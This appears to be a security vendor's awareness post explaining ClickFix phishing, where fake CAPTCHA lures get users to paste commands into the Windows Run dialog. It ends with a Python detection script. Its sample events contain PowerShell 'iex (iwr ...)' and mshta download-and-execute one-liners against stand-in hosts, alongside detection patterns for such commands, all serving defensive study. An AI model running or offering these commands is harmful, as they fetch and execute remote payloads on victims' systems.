Watch out for the ClickFix Phishing Scheme

The ClickFix Phishing Conundrum

Phishing is a potent weapon utilized by malicious actors. If you have an email, phone, or social media account, chances are you have already been the target of social engineering. Phishing aims to steal personal data by deceiving the user, often by impersonating trusted brands, contacts, and even personal relations.

Today, phishing is an escalating security risk. Generative AI tools let attackers impersonate brands, names, and trusted sources convincingly and at scale. Attack surfaces, the points through which a malicious actor can gain entry, have expanded greatly. And now threat actors are adopting a new, dangerous phishing method: the "ClickFix" technique.

This technique differs from standard phishing. A typical phishing email "encourages" the recipient to click a link or take quick, drastic action, and the aim is usually to harvest credentials such as passwords. ClickFix has a similar end goal, control of the victim's data and system, but it gets there differently: rather than asking for a password on a fake login page, it talks the victim into running a command on their own machine. Understanding that difference matters for both personal and professional security.

What ClickFix Does

ClickFix lures are a bit more involved than a typical social engineering message. Instead of clicking a link, the victim is asked to "resolve" a seemingly benign check, most often a fake CAPTCHA or "human verification" step, or a fake error shown while trying to view a document or video. The "fix" is a short set of keyboard steps: the page silently copies a command to the clipboard, then instructs the user to open the Windows Run dialog (Win+R), paste (Ctrl+V), and press Enter. The user runs the attacker's command themselves, usually a PowerShell or mshta one-liner that downloads and executes a payload, with whatever privileges the user's account has.

The phishing element is unchanged: ClickFix depends on deception. A user has to trust the message enough to run commands on their own system or server, which is why attackers lean on brand impersonation, something generative AI tools have made far easier. Because the user performs the dangerous step, ClickFix sidesteps many automated defenses: there is no malicious attachment for a mail gateway to scan, often no download for the browser to block, and the command runs through a legitimate, signed Windows binary such as powershell.exe or mshta.exe. No automated control can stop a user from "solving" a fake check, so detection has to happen at the endpoint, when the pasted command runs.

A simplified ClickFix attack chain looks as follows:

  • A user or organization is targeted by a phishing email, a malicious advertisement, or a compromised website that displays the lure
  • The user is prompted to engage with a falsified security check, such as a fake CAPTCHA or a fake error message
  • The user follows the "fix" instructions and pastes the attacker's command into the Run dialog, PowerShell, or a terminal
  • The command downloads and executes the malicious payload, typically an infostealer, a remote access trojan, or ransomware

Once the payload runs, the attacker has a foothold on the user's system and, if that system is joined to a corporate network, a starting point for lateral movement into it. In many cases this access is used to steal information, either to fuel further social-engineering attacks or to support ransomware demands.

Lures and Phishing Traps

ClickFix relies on falsified media or interactive elements to succeed. A user may be prompted to "resolve" a security issue, provide information, or visit a malicious website and enter data, much like other social engineering schemes.

What sets it apart is the "human verification" step, which is not normally associated with phishing. A user who hits an obstacle and wants a quick resolution feels pressured to clear the falsified check as fast as possible. To appear legitimate, attackers dress the lure in familiar brand imagery, such as a faithful copy of a well-known CAPTCHA widget.

In rarer cases, a ClickFix email may be dressed up as an account alert involving critical personal information, such as a bank or even Social Security notice. Because the payloads it delivers are the same ones behind credential theft and ransomware, ClickFix should be treated as a genuine threat to your network.

Mitigating and Reducing Risk

Now for the hard question: with some working knowledge of ClickFix schemes, how do you reduce the risk of falling victim to one? As with phishing in general, there is no single answer. Thwarting phishing is an ongoing process of recognizing deception techniques as they appear.

There are, however, a few steps you can take for yourself and your organization:

  • Run awareness training and debriefs that specifically cover the ClickFix pattern: no legitimate website or CAPTCHA will ever ask you to press Win+R and paste a command
  • Apply a zero-trust mindset to emails from "official" sources
  • Refuse to access or interact with unknown media until it has been verified through an official channel
  • "If you're unsure, then ignore!"
  • Where users do not need it, disable the Windows Run dialog through Group Policy, and turn on PowerShell script block and command-line logging so that pasted commands are recorded
  • Use endpoint detection and response (EDR) tooling that can flag and quarantine the process chains ClickFix relies on (for example, explorer.exe launching powershell.exe or mshta.exe with a download command) and isolate a host remotely when one is found
  • During an investigation, check the victim's RunMRU registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), which records commands entered into the Run dialog
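As an added example (not code from the original article or from Bytagig), the following Python script shows what the endpoint-side "automated check" that the email gateway cannot provide can look like in practice: it scores process-creation events for the chain described above, an interactive parent such as explorer.exe (the Run dialog) launching a signed Windows binary whose command line carries a download cradle, a hidden window flag, or a CAPTCHA-style comment. The event field names (parent_image, image, command_line) and the sample events are constructed assumptions for illustration, not any vendor's telemetry format or real captured data.

```python
"""Flag ClickFix-style execution chains in process-creation events.

Added example, not code from the original article or from Bytagig. The events
below are constructed to resemble Sysmon Event ID 1 / EDR process-creation
records; the field names are assumptions, not any vendor's schema.
"""
import ntpath
import re

# Signed Windows binaries that ClickFix lures tell the victim to launch.
LOLBINS = {
    "powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
    "curl.exe", "certutil.exe", "wscript.exe", "cscript.exe",
}

# Parents that imply a human typed or pasted the command (Run dialog, shells,
# Windows Terminal) rather than a service or scheduled task.
INTERACTIVE_PARENTS = {
    "explorer.exe", "cmd.exe", "powershell.exe", "pwsh.exe", "windowsterminal.exe",
}

# Weighted command-line indicators. The lure-text one matters: ClickFix
# one-liners often end in a comment such as "# I am not a robot - reCAPTCHA
# Verification ID: 1234" so the Run dialog shows something reassuring.
INDICATORS = [
    (re.compile(r"https?://", re.I), 1, "remote URL"),
    (re.compile(r"\b(iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|downloadfile)\b", re.I), 2, "download cradle"),
    (re.compile(r"\biex\b|invoke-expression", re.I), 2, "invoke-expression"),
    (re.compile(r"-(w|windowstyle)\s+hidden", re.I), 1, "hidden window"),
    (re.compile(r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), 2, "encoded command"),
    (re.compile(r"-nop\b|-noprofile", re.I), 1, "no profile"),
    (re.compile(r"\bmshta(\.exe)?\b.*https?://", re.I), 3, "mshta with remote script"),
    (re.compile(r"not a robot|captcha|verif", re.I), 3, "CAPTCHA/verification lure text"),
]


def _basename(path):
    """Lower-cased file name of a Windows path; ntpath handles backslashes on any OS."""
    return ntpath.basename(path).lower()


def score_event(event):
    """Return (score, reasons) from the command-line indicators of one event."""
    score, reasons = 0, []
    for pattern, weight, label in INDICATORS:
        if pattern.search(event["command_line"]):
            score += weight
            reasons.append(label)
    return score, reasons


def detect(events, threshold=3):
    """Return findings for events that look like a user-run ClickFix command.

    Gate on the process chain first (interactive parent launching a LOLBin),
    then require enough command-line indicators to clear the threshold, so an
    admin running curl against an intranet URL is not flagged.
    """
    findings = []
    for index, event in enumerate(events):
        image, parent = _basename(event["image"]), _basename(event["parent_image"])
        if image not in LOLBINS or parent not in INTERACTIVE_PARENTS:
            continue
        score, reasons = score_event(event)
        if score >= threshold:
            findings.append({"index": index, "parent": parent, "image": image,
                             "score": score, "reasons": reasons})
    return findings


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {  # 0: classic ClickFix, Run dialog (explorer.exe) -> PowerShell download cradle
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": 'powershell -w hidden -nop -c "iex (iwr \'http://lure.example.invalid/x\')" '
                        "# I am not a robot - reCAPTCHA Verification ID: 7392"},
    {  # 1: maintenance script started by the task scheduler, benign
        "parent_image": r"C:\Windows\System32\svchost.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
    {  # 2: ClickFix variant that pulls a remote HTA through mshta
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\mshta.exe",
        "command_line": "mshta https://lure.example.invalid/verify.hta"},
    {  # 3: user opening Notepad from the Start menu, benign
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\notepad.exe",
        "command_line": "notepad.exe"},
    {  # 4: admin downloading a report in a shell: interactive parent plus URL, nothing else
        "parent_image": r"C:\Windows\System32\cmd.exe",
        "image": r"C:\Windows\System32\curl.exe",
        "command_line": "curl -o report.pdf https://intranet.example.invalid/report.pdf"},
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(f"event {finding['index']}: {finding['parent']} -> {finding['image']} "
              f"score={finding['score']} reasons={finding['reasons']}")
```

Run as written, it flags events 0 and 2 and leaves the scheduled script, Notepad, and the intranet curl alone. The same gating logic (parent process plus command-line indicators) translates directly into a Sysmon filter, a SIEM correlation rule, or an EDR custom detection; the weights and threshold are starting points to tune against your own baseline of legitimate PowerShell use.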

Remember, the first and most important thing you can do is recognize a threat. ClickFix is merely an evolution of social engineering tactics. Practicing caution and using common sense can go a long way toward protecting your data from ClickFix.

For additional resources and help, contact Bytagig today for additional information.
